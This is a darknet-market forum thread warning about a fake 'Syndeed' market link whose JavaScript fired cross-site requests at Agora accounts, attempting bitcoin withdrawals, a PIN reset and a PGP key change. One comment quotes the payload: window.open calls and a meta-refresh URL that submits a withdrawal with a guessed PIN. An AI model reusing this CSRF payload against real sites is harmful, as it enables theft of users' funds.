BE CAREFUL OF MESSAGES ON AGORA ABOUT A NEW MARKET CALLED SYNDEED

Got a message from user brandos on Agora about a new market. It doesn't say the name or anything but the guy says he's an old seller and started his own market.

If you open the link, it takes you to Syndeed. I saw that it said I needed to enable javascript for verification process. I thought damn that's not good that you have to enable javascript. Well, I wanted to see if it was anything worth looking at, so I did it.

Immediately after I clicked to open the page, tons of Agora tabs opened up saying "Unable to withdraw amount: 1.0000000", "Unable to withdraw amount: 2.0000000", etc. and there were like at least 20 pages with different amounts. 2.0, 0.5, etc. Luckily I had only like $20 in my account. There were a bunch more tabs opened but they said "you are sending more than 2 requests/min, chill out" or something like that.

Also it initiated a PIN reset, changed my PGP to a link to their site, and maybe even more that I didn't notice. It says PIN reset initiated and I can change it in 19 days. Do I need to worry about anything, or does it just ask me in 19 days to setup a new PIN?

Also is my password compromised or anything? Or am I good?

TLDR: Stay the fuck away from that link and don't click it. And if you do, don't be logged into Agora while you do it!!


Comments


[67 Points] ImLiterallyARetard:

Lol I guess my username checks out....


[18 Points] devinterloper:

The most frustrating part of using DNMs for me, as a web developer, is having to use these really poorly built platforms. Security and usability are seriously lacking on so many of the marketplaces, Agora is vulnerable to the most basic of CSRF attack: that's really poor... and what is so frustrating about this is that I can't develop my own market place without risking my freedom. I would love to develop and deploy a market place that solves all these problems (and more) but I can't take the risk... so ultimately my criticisms are wasted because the people behind Agora etc. are willing to take risks I'm not, and they're superior in this market for that reason.


[7 Points] Jay-__:

Damn, this is just such a perfect example why JavaScript is bad.

Upvoted for visibility.

As to your PIN-reset question: sorry, no idea, I never used that.

I'd set the PGP back, change my PW and send a message to support about it all, so they can take actions against that link and also to find out about the PIN-thing.

Or even make a completely fresh account, just to get 100% sure, but still change everything on the old account back and set it's profile up with a PGP-signed message stating you switched accounts, so vendors can verify it, if you are worried about losing feedback.

Good luck.

Edit: Please read my other comment in here:

https://www.reddit.com/r/DarkNetMarkets/comments/39cq1e/be_careful_of_messages_on_agora_about_a_new/cs2dx13


[3 Points] TheRealDealMarket:

Didn't think agora would be vuln to cross-site-request-forgery...


[3 Points] hijacks8890:

I wonder how this attack would be possible, i understand the concept:

It could not even be used to change your Agora credentials and manually withdraw after a pin reset because you would need the user's original password.

How could this attack work? It could not.


[3 Points] asdwadzc:

The function aes_key_verify is called but it doesn't use the AES class, it simply calls the window.open commands for resetting pin and withdrawing using this URL:

http://badURL . oni0n/process?action=send&amount=1&wait=1

That page then uses this to withdraw bitcoins to a random BTC address:

<meta http-equiv="refresh" content="1; URL=http://agoraURL . oni0n /sendbitcoins?targetaddress=RAMDOMADDRESS&withdrawschedule=0&targetamount=1&walletpin=1111&submit=Send">


[2 Points] The_Grid_Is_Up:

Damn, that's a nasty script.


[2 Points] footlockervip:

damn thats hardcore.


[2 Points] impost_r:

Ehrrr...... something doesn't add up here, how could it ever withdraw without knowing your PIN? It can't retroactively keylog your or something.


[2 Points] Idonu:

I saw that it said I needed to enable javascript for verification process. I thought damn that's not good that you have to enable javascript. Well, I wanted to see if it was anything worth looking at, so I did it.

Wat....


[2 Points] gramsadmin:

I can't believe agora who says they focus so much on security and is always done because they are updating their server, left such an easy exploit open.


[2 Points] TotesMessenger:

I'm a bot, bleep, bloop. Someone has linked to this thread from another place on reddit:

If you follow any of the above links, please respect the rules of reddit and don't vote in the other threads. (Info / Contact)


[1 Points] kriminale:

Brothers here is kriminale im not an expert on internet im an expert in drugs so please if someone can write what is happening i would great bro thanx


[1 Points] None:

[removed]


[1 Points] None:

[removed]


[1 Points] None:

[removed]


[1 Points] None:

Why is it us god damn Aussies that are allways the ones being scammed or doing the scamming. Fucking hell.


[1 Points] gwernisthenewpine:

I'm curious how they got the master account list in the first place. I had another user telling me that there was a dox file floating around with my name on it, which I said was impossible 'cause I've always encrypted. Poked around the link (file hosting site), and turns out they're trying to get people to open an executable file :/ something happened with Agora's database today, I think.. Don't even know who these users are, how do they get access to the master account list?


[1 Points] None:

This is one of the reasons I tell you guys not to enable javascript in your tor browser.

Oh well, sounds like nothing important happened to you. You didn't lose any money cause you didn't have enough for him to want? Good.


[1 Points] blackout86:

Got the same msg didnt look though.


[1 Points] 3rdthrowayyfoe:

I'm old seller and I would like to invite you to new market.

We are having stable cooperation with sellers. Thanks to the fact we can offer:

We offer clear rules and 24h technical support. Lololol


[1 Points] None:

[removed]


[1 Points] spike25:

CSRF tokens, these unknowns.


[1 Points] MrSunshine_Agora:

HEY DO YOU SEE WARNING #1 and #2 WTF.

If your smart you will listen to us, and not Reddit, Sydneed is a Exploit URL, it "IS NOT" a new site.


[1 Points] MrSunshine_Agora:

Is this a Java related issue? I do not have java activated, it doesn't even come up as a plugin, and I had a problem. Do you have another theory?


[0 Points] assiassin:

Change all passwords, change your pgp back, and report to admins if you haven't already. Did it withdraw the btc successfully or did agora's withdraw security catch it in time?


[0 Points] yiddoyiddoyiddo:

Never click any links.


[-2 Points] Str8b8m8ey:

It would not be hard for these guys to test this code they've written. With the amount of effort spent to write it, lets just assume they got it working before blasting it off on marks. If you don't assume that, then get fucked in the face gagging deep throat hard to the point your mouth is bruised and your jaw is fractured. Because that is what it will feel like when you fall for this shit.


[-10 Points] krokodiltear:

Posts like this are incredibly unfair to new marketplaces; you need to independently verify the accuracy of your report at least twice before making these kinds of accusations.

Try depositing another $20 into your Syndeed account and report back with your findings.